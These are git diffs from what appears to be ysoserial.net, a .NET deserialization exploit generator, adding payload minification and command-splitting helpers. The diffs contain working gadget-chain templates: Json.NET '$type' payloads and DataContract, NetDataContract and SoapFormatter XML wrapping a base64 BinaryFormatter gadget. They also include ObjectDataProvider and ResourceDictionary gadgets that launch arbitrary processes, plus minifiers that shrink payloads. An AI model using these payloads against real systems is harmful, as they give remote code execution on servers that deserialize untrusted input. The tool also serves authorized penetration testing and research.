+                return Serialize(obj, formatter, test, minify);
             }
             else if (formatter.ToLower().Equals("json.net"))
             {
-                /*
+               
                 string payload = @"{
                     '$type': 'Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35',
                     'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"'
                 }";
-                */
+               
+                if (minify)
+                {
+                    payload = Helpers.JSONMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null);
+                }
 
-                // Payload has been shortened - if there is any problem, consider commenting the following payload and re-enable the previous one
-                string payload = @"{'$type':'Microsoft.IdentityModel.Claims.WindowsClaimsIdentity,Microsoft.IdentityModel','System.Security.ClaimsIdentity.actor':'" + b64encoded + @"'}";
 
                 if (test)
                 {
@@ -100,16 +103,18 @@ namespace ysoserial.Generators
             }
             else if (formatter.ToLower().Equals("datacontractserializer"))
             {
-                /*
-                string payload = $@"<root xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"">
+                
+                string payload = $@"<root type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"">
     <WindowsClaimsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/Microsoft.IdentityModel.Claims"">
       <System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor>
        </WindowsClaimsIdentity>
 </root>
 ";
-*/
-                // Payload has been shortened - if there is any problem, consider commenting the following payload and re-enable the previous one
-                string payload = $@"<root type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity,Microsoft.IdentityModel""><WindowsClaimsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/Microsoft.IdentityModel.Claims""><System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor></WindowsClaimsIdentity></root>";
+
+                if (minify)
+                {
+                    payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null);
+                }
 
                 if (test)
                 {
@@ -129,7 +134,7 @@ namespace ysoserial.Generators
             }
             else if (formatter.ToLower().Equals("netdatacontractserializer"))
             {
-                /*
+
                 string payload = $@"<root>
 <w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns="""">
   <_actor z:Type=""System.String"" z:Assembly=""0"" >{b64encoded}</_actor>
@@ -142,9 +147,11 @@ namespace ysoserial.Generators
 </w>
 </root>
 ";
-*/
-                // Payload has been shortened - if there is any problem, consider commenting the following payload and re-enable the previous one
-                string payload = $@"<root><w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""><_actor z:Type=""System.String"" z:Assembly=""0"" >{b64encoded}</_actor><m_userToken z:Type=""System.IntPtr"" z:Assembly=""0""><value z:Type=""System.Int64"" z:Assembly=""0"">0</value></m_userToken><_label i:nil=""1""/><_nameClaimType i:nil=""1""/><_roleClaimType i:nil=""1""/></w></root>";
+
+                if (minify)
+                {
+                    payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null);
+                }
 
                 if (test)
                 {
@@ -164,7 +171,7 @@ namespace ysoserial.Generators
             }
             else if (formatter.ToLower().Equals("soapformatter"))
             {
-                /*
+
                 string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
 <SOAP-ENV:Body>
     <a1:WindowsClaimsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/Microsoft.IdentityModel.Claims/Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"">
@@ -173,9 +180,11 @@ namespace ysoserial.Generators
 </SOAP-ENV:Body>
 </SOAP-ENV:Envelope>
 ";
-*/
-                // Payload has been shortened - if there is any problem, consider commenting the following payload and re-enable the previous one
-                string payload = $@"<s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/""><s:Body><a:WindowsClaimsIdentity xmlns:a=""http://schemas.microsoft.com/clr/nsassem/Microsoft.IdentityModel.Claims/Microsoft.IdentityModel""><System.Security.ClaimsIdentity.actor>{b64encoded}</System.Security.ClaimsIdentity.actor></a:WindowsClaimsIdentity></s:Body></s:Envelope>";
+
+                if (minify)
+                {
+                    payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null);
+                }
 
                 if (test)
                 {

--- a/ysoserial/Generators/WindowsIdentityGenerator.cs
+++ b/ysoserial/Generators/WindowsIdentityGenerator.cs
@@ -66,16 +66,16 @@ namespace ysoserial.Generators
             }
         }
 
-        public override object Generate(string cmd, string formatter, Boolean test)
+        public override object Generate(string cmd, string formatter, Boolean test, Boolean minify)
         {
             Generator binaryFormatterGenerator = new TypeConfuseDelegateGenerator();
-            byte[] binaryFormatterPayload = (byte[])binaryFormatterGenerator.Generate(cmd, "BinaryFormatter", false);
+            byte[] binaryFormatterPayload = (byte[])binaryFormatterGenerator.Generate(cmd, "BinaryFormatter", false, minify);
             string b64encoded = Convert.ToBase64String(binaryFormatterPayload);
 
             if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
             {
                 var obj = new IdentityMarshal(b64encoded);
-                return Serialize(obj, formatter, test);
+                return Serialize(obj, formatter, test, minify);
             }
             else if (formatter.ToLower().Equals("json.net"))
             {
@@ -83,6 +83,11 @@ namespace ysoserial.Generators
                     '$type': 'System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
                     'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"'
                 }";
+
+                if (minify)
+                {
+                    payload = Helpers.JSONMinifier.Minify(payload, new string[] { "mscorlib" }, null);
+                }
 
                 if (test)
                 {
@@ -101,12 +106,16 @@ namespace ysoserial.Generators
             }
             else if (formatter.ToLower().Equals("datacontractserializer"))
             {
-                string payload = $@"<root xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" type=""System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
+                string payload = $@"<root type=""System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
     <WindowsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"">
       <System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor>
        </WindowsIdentity>
 </root>
 ";
+                if (minify)
+                {
+                    payload = Helpers.XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
+                }
 
                 if (test)
                 {
@@ -132,6 +141,10 @@ namespace ysoserial.Generators
 </w>
 </root>
 ";
+                if (minify)
+                {
+                    payload = Helpers.XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
+                }
 
                 if (test)
                 {
@@ -159,6 +172,10 @@ namespace ysoserial.Generators
 </SOAP-ENV:Body>
 </SOAP-ENV:Envelope>
 ";
+                if (minify)
+                {
+                    payload = Helpers.XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
+                }
 
                 if (test)
                 {

--- a/ysoserial/Generators/WindowsIdentityGenerator.cs
+++ b/ysoserial/Generators/WindowsIdentityGenerator.cs
@@ -174,7 +174,7 @@ namespace ysoserial.Generators
 ";
                 if (minify)
                 {
-                    payload = Helpers.XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
+                    payload = Helpers.XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null, Helpers.FormatterType.SoapFormatter);
                 }
 
                 if (test)

--- a/ysoserial/Helpers/BFMinifier.cs
+++ b/ysoserial/Helpers/BFMinifier.cs
@@ -1,0 +1,13 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace ysoserial.Helpers
+{
+    class BFMinifier
+    {
+        //TODO
+    }
+}

--- a/ysoserial/Helpers/BFMinifier.cs
+++ b/ysoserial/Helpers/BFMinifier.cs
@@ -1,8 +1,4 @@
-﻿using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
+﻿
 
 namespace ysoserial.Helpers
 {

--- a/ysoserial/Helpers/CommandArgSplitter.cs
+++ b/ysoserial/Helpers/CommandArgSplitter.cs
@@ -1,0 +1,111 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+using System.Xml;
+
+namespace ysoserial.Helpers
+{
+    class CommandArgSplitter
+    {
+        public enum CommandType : ushort
+        {
+            None = 0,
+            XML = 1,
+            JSON = 2,
+            YamlDotNet = 3,
+            XMLinJSON = 4,
+            JSONinXML = 5,
+        }
+
+        public static String[] SplitCommand(string cmd, CommandType cmdType, out Boolean hasArgs)
+        {
+            hasArgs = false;
+            String[] result = SplitCommand(cmd);
+            if (result.Length == 2) hasArgs = true;
+
+            if (cmdType == CommandType.JSON)
+            {
+                // escape for JSON
+                result[0] = result[0].Replace("\\", "\\\\").Replace("\"", "\\\"").Replace("'", "\'");
+                if (hasArgs)
+                {
+                    result[1] = result[1].Replace("\\", "\\\\").Replace("\"", "\\\"").Replace("'", "\'");
+                }
+            }
+            else if (cmdType == CommandType.XML)
+            {
+                // escape for XML
+                result[0] = XmlString(result[0]);
+                if (hasArgs)
+                {
+                    result[1] = XmlString(result[1]);
+                }
+            }
+            else if (cmdType == CommandType.XMLinJSON)
+            {
+                // escape for XML
+                result[0] = JsonString(XmlString(result[0]));
+                if (hasArgs)
+                {
+                    result[1] = JsonString(XmlString(result[1]));
+                }
+            }
+            else if (cmdType == CommandType.JSONinXML)
+            {
+                // escape for XML
+                result[0] = XmlString(JsonString(result[0]));
+                if (hasArgs)
+                {
+                    result[1] = XmlString(JsonString(result[1]));
+                }
+            }
+            else if (cmdType == CommandType.YamlDotNet)
+            {
+
+                if (result[0].Contains("'"))
+                {
+                    result[0] = result[0].Replace("'", "''");
+                    result[0] = "'" + result[0] + "'";
+                }
+
+                if (hasArgs && result[1].Contains("'"))
+                {
+                    result[1] = result[1].Replace("'", "''");
+                    result[1] = "'" + result[1] + "'";
+                }
+            }
+
+            return result;
+        }
+
+        public static string XmlString(string text)
+        {
+            XmlDocument _xmlDoc = new XmlDocument();
+            var el = _xmlDoc.CreateElement("t");
+            el.InnerText = text;
+            return el.InnerXml;
+        }
+
+        public static string JsonString(string text)
+        {
+            return text.Replace("\\", "\\\\").Replace("\"", "\\\"").Replace("'", "\'");
+        }
+
+        public static String[] SplitCommand(string cmd, out Boolean hasArgs)
+        {
+            hasArgs = false;
+            String[] result = SplitCommand(cmd);
+            if (result.Length == 2) hasArgs = true;
+            return result;
+        }
+
+        public static String[] SplitCommand(string cmd)
+        {
+            String[] result = cmd.Split(new char[] { ' ' }, 2);
+            return result;
+        }
+
+    }
+}

--- a/ysoserial/Helpers/CommandArgSplitter.cs
+++ b/ysoserial/Helpers/CommandArgSplitter.cs
@@ -1,10 +1,7 @@
 ﻿using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
 using System.Xml;
 
+// Coded by Soroush Dalili (@irsdl)
 namespace ysoserial.Helpers
 {
     class CommandArgSplitter

--- a/ysoserial/Helpers/CommandArgSplitter.cs
+++ b/ysoserial/Helpers/CommandArgSplitter.cs
@@ -1,7 +1,6 @@
 ﻿using System;
 using System.Xml;
 
-// Coded by Soroush Dalili (@irsdl)
 namespace ysoserial.Helpers
 {
     class CommandArgSplitter

--- a/ysoserial/Helpers/DevTest/SerializersHelper.cs
+++ b/ysoserial/Helpers/DevTest/SerializersHelper.cs
@@ -20,7 +20,7 @@ using System.Windows.Markup;
 using System.Xml;
 using System.Xml.Serialization;
 
-namespace ysoserial.DevTest
+namespace ysoserial.Helpers.DevTest
 {
     class SerializersHelper
     {
@@ -182,8 +182,15 @@ namespace ysoserial.DevTest
         public static object ObjectDataProviderGadget(string cmd)
         {
             ProcessStartInfo psi = new ProcessStartInfo();
-            psi.FileName = "cmd";
-            psi.Arguments = "/c " + cmd;
+
+            Boolean hasArgs;
+            string[] splittedCMD = Helpers.CommandArgSplitter.SplitCommand(cmd, out hasArgs);
+            psi.FileName = splittedCMD[0];
+            if (hasArgs)
+            {
+                psi.Arguments = splittedCMD[1];
+            }
+
             StringDictionary dict = new StringDictionary();
             psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict);
             Process p = new Process();
@@ -198,8 +205,15 @@ namespace ysoserial.DevTest
         public static object ResourceDictionaryGadget(string cmd)
         {
             ProcessStartInfo psi = new ProcessStartInfo();
-            psi.FileName = "cmd";
-            psi.Arguments = "/c " + cmd;
+
+            Boolean hasArgs;
+            string[] splittedCMD = Helpers.CommandArgSplitter.SplitCommand(cmd, out hasArgs);
+            psi.FileName = splittedCMD[0];
+            if (hasArgs)
+            {
+                psi.Arguments = splittedCMD[1];
+            }
+
             StringDictionary dict = new StringDictionary();
             psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict);
             Process p = new Process();

--- a/ysoserial/Helpers/DevTest/SerializersHelper.cs
+++ b/ysoserial/Helpers/DevTest/SerializersHelper.cs
@@ -1,25 +1,18 @@
-﻿using Microsoft.VisualStudio.Text.Formatting;
-using System;
-using System.Collections;
-using System.Collections.Generic;
+﻿using System;
 using System.Collections.Specialized;
-using System.ComponentModel.Design;
-using System.Data;
 using System.Diagnostics;
 using System.Globalization;
 using System.IO;
-using System.Linq;
 using System.Reflection;
 using System.Runtime.Serialization;
-using System.Runtime.Serialization.Formatters.Binary;
 using System.Text;
-using System.Web.UI.WebControls;
 using System.Windows;
 using System.Windows.Data;
 using System.Windows.Markup;
 using System.Xml;
 using System.Xml.Serialization;
 
+// Coded by Soroush Dalili (@irsdl)
 namespace ysoserial.Helpers.DevTest
 {
     class SerializersHelper

--- a/ysoserial/Helpers/DevTest/SerializersHelper.cs
+++ b/ysoserial/Helpers/DevTest/SerializersHelper.cs
@@ -12,7 +12,6 @@ using System.Windows.Markup;
 using System.Xml;
 using System.Xml.Serialization;
 
-// Coded by Soroush Dalili (@irsdl)
 namespace ysoserial.Helpers.DevTest
 {
     class SerializersHelper

--- a/ysoserial/Helpers/JSONMinifier.cs
+++ b/ysoserial/Helpers/JSONMinifier.cs
@@ -3,7 +3,6 @@ using System;
 using System.IO;
 using System.Text.RegularExpressions;
 
-// Coded by Soroush Dalili (@irsdl)
 namespace ysoserial.Helpers
 {
     class JSONMinifier

--- a/ysoserial/Helpers/JSONMinifier.cs
+++ b/ysoserial/Helpers/JSONMinifier.cs
@@ -1,12 +1,9 @@
 ﻿using Newtonsoft.Json;
 using System;
-using System.Collections.Generic;
 using System.IO;
-using System.Linq;
-using System.Text;
 using System.Text.RegularExpressions;
-using System.Threading.Tasks;
 
+// Coded by Soroush Dalili (@irsdl)
 namespace ysoserial.Helpers
 {
     class JSONMinifier
@@ -31,8 +28,6 @@ namespace ysoserial.Helpers
             // replacing spaces between things like:
             // Microsoft.IdentityModel, Version=3.5.0.0, PublicKeyToken=31bf3856ad364e35
             // clr-namespace:System.Diagnostics; assembly=system
-            //jsonString = Regex.Replace(jsonString, @"[""'](\s*[^,;""']+\s*[,;]\s*)+([^,;""']+\s*)[""']", delegate (Match m) { return m.Value.Replace(" ", ""); });
-
             jsonString = Regex.Replace(jsonString, @"([a-zA-Z0-9\.\-\:=_\s]+[;,]\s*)+([a-zA-Z0-9\.\-\:=_\s]+)[""'\]\<]", delegate (Match m) {
                 // we do not want to remove spaces when two alphanumeric strings are next to each other
                 String finalVal = m.Value;
@@ -42,8 +37,10 @@ namespace ysoserial.Helpers
                 return finalVal;
             });
 
-            // replacing not strong (loose) assembly names
+            // TODO: We are not replacing true with 1 and false with 0 at the moment due to the fact that none of the payloads in here has it
+            // This needs to be implemented in the future if we have such JSON objects in the future
 
+            // replacing not strong (loose) assembly names
             if (LooseAssemblyNames != null)
             {
                 foreach (String asmName in LooseAssemblyNames)

--- a/ysoserial/Helpers/JSONMinifier.cs
+++ b/ysoserial/Helpers/JSONMinifier.cs
@@ -1,0 +1,79 @@
+﻿using Newtonsoft.Json;
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Text.RegularExpressions;
+using System.Threading.Tasks;
+
+namespace ysoserial.Helpers
+{
+    class JSONMinifier
+    {
+        public static String Minify(String jsonString, String[] LooseAssemblyNames, String[] finalDiscardableRegExStringArray)
+        {
+            /*
+            xmlDocument = XmlParserNamespaceMinifier(xmlDocument);
+            xmlDocument = XmlXSLTMinifier(xmlDocument);
+            
+            */
+
+            jsonString = JSONNETMinifier(jsonString);
+            jsonString = JSONDirtyMatchReplaceMinifier(jsonString, LooseAssemblyNames, finalDiscardableRegExStringArray);
+
+            return jsonString;
+        }
+
+        private static String JSONDirtyMatchReplaceMinifier(String jsonString, String[] LooseAssemblyNames, String[] finalDiscardableRegExStringArray)
+        {
+
+            // replacing spaces between things like:
+            // Microsoft.IdentityModel, Version=3.5.0.0, PublicKeyToken=31bf3856ad364e35
+            // clr-namespace:System.Diagnostics; assembly=system
+            //jsonString = Regex.Replace(jsonString, @"[""'](\s*[^,;""']+\s*[,;]\s*)+([^,;""']+\s*)[""']", delegate (Match m) { return m.Value.Replace(" ", ""); });
+
+            jsonString = Regex.Replace(jsonString, @"([a-zA-Z0-9\.\-\:=_\s]+[;,]\s*)+([a-zA-Z0-9\.\-\:=_\s]+)[""'\]\<]", delegate (Match m) {
+                // we do not want to remove spaces when two alphanumeric strings are next to each other
+                String finalVal = m.Value;
+                finalVal = Regex.Replace(finalVal, @"([^\w])[\s]+([\w])", "$1$2");
+                finalVal = Regex.Replace(finalVal, @"([\w])[\s]+([^\w])", "$1$2");
+                finalVal = Regex.Replace(finalVal, @"([^\w])[\s]+([^\w])", "$1$2");
+                return finalVal;
+            });
+
+            // replacing not strong (loose) assembly names
+
+            if (LooseAssemblyNames != null)
+            {
+                foreach (String asmName in LooseAssemblyNames)
+                {
+                    jsonString = Regex.Replace(jsonString, @"([""',=/])\s*(" + asmName + @")(\s*[,]\s*[^,""']+)+\s*([""'])", "$1$2$+");
+                }
+            }
+
+            if (finalDiscardableRegExStringArray != null)
+            {
+                foreach (String dRegEx in finalDiscardableRegExStringArray)
+                {
+                    jsonString = Regex.Replace(jsonString, dRegEx, "");
+                }
+            }
+
+            return jsonString;
+        }
+        private static String JSONNETMinifier(String jsonString)
+        {
+            using (StringWriter stringWriter = new StringWriter())
+            using (JsonReader jsonReader = new JsonTextReader(new StringReader(jsonString)))
+            using (JsonWriter jsonWriter = new JsonTextWriter(stringWriter))
+            {
+                jsonWriter.Formatting = Formatting.None;
+                jsonWriter.WriteToken(jsonReader);
+                jsonString = stringWriter.ToString();
+            }
+
+            return jsonString;
+        }
+    }
+}

--- a/ysoserial/Helpers/XMLMinifier.cs
+++ b/ysoserial/Helpers/XMLMinifier.cs
@@ -1,0 +1,497 @@
+﻿using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Text.RegularExpressions;
+using System.Threading.Tasks;
+using System.Xml;
+using System.Xml.Xsl;
+
+// Coded by Soroush Dalili (@irsdl)
+// This is shorten the XML payloads
+namespace ysoserial.Helpers
+{
+    public enum FormatterType : ushort
+    {
+        None = 0,
+        BinaryFormatter = 1,
+        SoapFormatter = 2,
+        LosFormatter = 3,
+        ObjectStateFormatter = 4,
+        DataContractXML = 5,
+        NetDataContractXML = 6,
+    }
+
+    class XMLMinifier
+    {
+        
+
+        public static MemoryStream Minify(Stream xmlDocumentStream, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray)
+        {
+            return Minify(xmlDocumentStream, looseAssemblyNames, finalDiscardableRegExStringArray, FormatterType.None);
+        }
+
+        public static MemoryStream Minify(Stream xmlDocumentStream, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, FormatterType formatterType)
+        {
+            StreamReader reader = new StreamReader(xmlDocumentStream);
+            string xmlDocument = reader.ReadToEnd();
+            xmlDocument = Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, formatterType);
+            byte[] byteArray = Encoding.UTF8.GetBytes(xmlDocument);
+            return new MemoryStream(byteArray);
+        }
+
+        public static String Minify(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray)
+        {
+            return Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, FormatterType.None);
+        }
+
+        public static String Minify(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, FormatterType formatterType)
+        {
+            xmlDocument = XmlParserNamespaceMinifier(xmlDocument);
+
+            if (formatterType.Equals(FormatterType.SoapFormatter))
+            {
+                xmlDocument = SoapRefIdMinifier(xmlDocument);
+            }else if (formatterType.Equals(FormatterType.NetDataContractXML))
+            {
+                xmlDocument = NetDataContractorIdMinifier(xmlDocument);
+            }
+            else if (formatterType.Equals(FormatterType.DataContractXML))
+            {
+                xmlDocument = DataContractorIdMinifier(xmlDocument);
+            }
+
+            xmlDocument = XmlXSLTMinifier(xmlDocument);
+            xmlDocument = XmlDirtyMatchReplaceMinifier(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray);
+
+            return xmlDocument;
+        }
+
+        private static String XmlParserNamespaceMinifier(String xmlDocument)
+        {
+            Dictionary<string, string> namespaceLocalNames = new Dictionary<string, string>();
+
+            // finding xmlns definitions
+            string pattern = @"xmlns:([^=]+)\s*=\s*[""']([^""']*)[""']";
+            Regex namespaceLocalNameRegEx = new Regex(pattern, RegexOptions.Compiled);
+            MatchCollection matches = namespaceLocalNameRegEx.Matches(xmlDocument);
+
+            foreach (Match match in matches)
+            {
+                // We need to ignore XMLNS in internal XML objects that are encoded or within CDATA
+                Regex isNotInternalRegEx = new Regex(@"(?<!\<\!\[CDATA\[\s*)<[\w:.]+[^<>]+" + Regex.Escape(match.Value));
+
+                if (isNotInternalRegEx.IsMatch(xmlDocument))
+                {
+                    GroupCollection groups = match.Groups;
+                    String namespaceValue = groups[2].Value;
+                    String namespaceLocalName = "";
+                    if (namespaceLocalNames.TryGetValue(namespaceValue, out namespaceLocalName))
+                    {
+                        // replacing duplicate namespace localname and its usage
+                        xmlDocument = ReplaceNamespaceNameAndValue(xmlDocument, groups[1].Value, namespaceLocalName);
+                    }
+                    else
+                    {
+                        namespaceLocalNames.Add(namespaceValue, groups[1].Value);
+                    }
+                }
+
+            }
+
+            // removing soap encodingStyle as it's not being used
+
+            string encodingStylePattern = @"([^\s]+):encodingStyle\s*=\s*[""']";
+            Regex encodingStyleRegEx = new Regex(encodingStylePattern, RegexOptions.Compiled);
+            MatchCollection encodingStyleMatches = namespaceLocalNameRegEx.Matches(xmlDocument);
+
+            foreach (Match match in encodingStyleMatches)
+            {
+                GroupCollection groups = match.Groups;
+                String namespaceLocalName = groups[1].Value;
+
+                var namespaceValue = namespaceLocalNames.FirstOrDefault(x => x.Value == namespaceLocalName).Key;
+
+                if (namespaceValue != null && namespaceValue.Equals("http://schemas.xmlsoap.org/soap/envelope/"))
+                {
+                    // so encodingStyle is useless
+                    xmlDocument = Regex.Replace(xmlDocument, namespaceLocalName + @":encodingStyle\s*=\s*[""'][^""']*[""']", "");
+                }
+            }
+
+            // populating an array of A-Z
+            String[] alpha = new String[26];
+            int counter = 0;
+            for (char c = 'A'; c <= 'Z'; c++)
+            {
+                alpha[counter] = c.ToString();
+                counter++;
+            }
+            counter = 0;
+
+            // replacing existing namespaces to make them shorter
+            string fixedPrefix = "XmlParserNamespaceMinifier_";
+            foreach (String namespaceLocalName in namespaceLocalNames.Values)
+            {
+                string newPrefix = fixedPrefix;
+                if (Math.Abs(counter / 26) == 0)
+                {
+                    newPrefix += alpha[counter % 26].ToLowerInvariant();
+                }
+                else if (Math.Abs(counter / 26) == 1)
+                {
+                    newPrefix += alpha[counter % 26];
+                }
+                else
+                {
+                    newPrefix += alpha[counter % 26].ToLowerInvariant() + (counter - 52);
+                }
+                counter++;
+
+                xmlDocument = ReplaceNamespaceNameAndValue(xmlDocument, namespaceLocalName, newPrefix);
+            }
+            xmlDocument = xmlDocument.Replace(fixedPrefix, "");
+            return xmlDocument;
+        }
+
+        private static String ReplaceNamespaceNameAndValue(String xmlDocument, String OldName, String NewName)
+        {
+            // replacing duplicate namespace localname
+            xmlDocument = Regex.Replace(xmlDocument, "xmlns:" + OldName + @"\s*=", "xmlns:" + NewName + "=");
+            // Replacing the usage
+            xmlDocument = Regex.Replace(xmlDocument, @"([\s/{<]+)" + OldName + ":", "$1" + NewName + ":");
+            xmlDocument = Regex.Replace(xmlDocument, @"(=\s*[""'])" + OldName + ":", "$1" + NewName + ":");
+
+            return xmlDocument;
+        }
+
+
+        private static String XmlDirtyMatchReplaceMinifier(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray)
+        {
+            // replacing spaces before > or /> in valid elements
+            xmlDocument = Regex.Replace(xmlDocument, @"(\<\/?[\w\:_]+([\s/]+[a-zA-Z0-9\.\-\:=_]+\s*=\s*(""[^""]*""|'[^']*'))*)\s+(\/?>)", "$1$+");
+
+            // replacing :nil="true" with :nil="1" as it does not matter in .NET
+            xmlDocument = Regex.Replace(xmlDocument, @":(nil|boolean)\s*=\s*([""'])true[""']", ":$1=${2}1${2}");
+            xmlDocument = Regex.Replace(xmlDocument, @":(nil|boolean)\s*=\s*([""'])false[""']", ":$1=${2}0${2}");
+
+            // replacing spaces between things like:
+            // Microsoft.IdentityModel, Version=3.5.0.0, PublicKeyToken=31bf3856ad364e35
+            // clr-namespace:System.Diagnostics; assembly=system
+            // {         x:Type      Diag:Process   }
+            // Int32 Compare(System.String, System.String)
+
+            //xmlDocument = Regex.Replace(xmlDocument, @"[""'](\s*[^&,;""'<]+\s*[,;]\s*)+([^&,;""'<]+\s*)[""']", delegate (Match m) { return m.Value.Replace(" ", ""); });
+
+            xmlDocument = Regex.Replace(xmlDocument, @"([a-zA-Z0-9\.\-\:=_\s]+[;,]\s*)+([a-zA-Z0-9\.\-\:=_\s]+)[""'\]\<]", delegate (Match m) {
+                // we do not want to remove spaces when two alphanumeric strings are next to each other
+                String finalVal = m.Value;
+                finalVal= Regex.Replace(finalVal, @"([^\w])[\s]+([\w])", "$1$2");
+                finalVal = Regex.Replace(finalVal, @"([\w])[\s]+([^\w])", "$1$2");
+                finalVal = Regex.Replace(finalVal, @"([^\w])[\s]+([^\w])", "$1$2");
+                return finalVal;
+            });
+
+            xmlDocument = Regex.Replace(xmlDocument, @"([""'])\s*\{\s*([^&""'}\s]+)\s+([^&""'}\s]+)\s*\}\s*([""'])", "$1{$2 $3}$4");
+
+            xmlDocument = Regex.Replace(xmlDocument, @"([""'])\s*\{\s*([^&""'}\s]+)\s*\}\s*([""'])", "$1{$2}$3");
+
+            //xmlDocument = Regex.Replace(xmlDocument, @"([a-zA-Z0-9\.\-_]+\(([a-zA-Z0-9\.\-_]+\s*,)+\s*([a-zA-Z0-9\.\-_]+\s*)\))", delegate (Match m) { return m.Value.Replace(" ", ""); });
+
+            // replacing not strong (loose) assembly names
+
+            if (looseAssemblyNames != null)
+            {
+                foreach (String asmName in looseAssemblyNames)
+                {
+                    xmlDocument = Regex.Replace(xmlDocument, @"([""',=/>])\s*(" + asmName + @")([;,][a-zA-Z0-9\.\-\:=]+\s*)+([""'\]\<])", "$1$2$+");
+                }
+            }
+
+            if (finalDiscardableRegExStringArray != null)
+            {
+                foreach (String dRegEx in finalDiscardableRegExStringArray)
+                {
+                    xmlDocument = Regex.Replace(xmlDocument, dRegEx, "");
+                }
+            }
+
+            return xmlDocument;
+        }
+
+
+        private static String XmlXSLTMinifier(String xmlDocument)
+        {
+            XmlDocument minifiedXMLDoc = new XmlDocument();
+            minifiedXMLDoc.LoadXml(xmlDocument);
+
+            // by Soroush Dalili (@irsdl)
+            // from various sources such as:
+            //https://stackoverflow.com/questions/4593326/xsl-how-to-remove-unused-namespaces-from-source-xml
+            //https://stackoverflow.com/questions/13974247/how-can-i-trim-space-in-xslt-without-replacing-repating-whitespaces-by-single-on
+
+            String xsltDoc = @"<xsl:stylesheet version=""1.0""
